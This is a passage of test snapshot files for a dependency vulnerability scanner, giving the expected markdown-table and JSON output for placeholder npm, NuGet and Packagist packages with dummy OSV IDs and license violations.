| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. # Deprecated packages | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | | npm | deprecated-pkg | 1.0.0 | path/to/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine2 | 5.9.0 | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 (dev) | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | 4.3 | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintMarkdownTableResults_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | 9 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | 8.3 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine3 | 0.10.2-rc | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
| OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/second/lockfile | --- ================================================ FILE: internal/output/__snapshots__/output_result_test.snap ================================================ [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 
0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { 
"Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], 
"Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { 
"Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": 
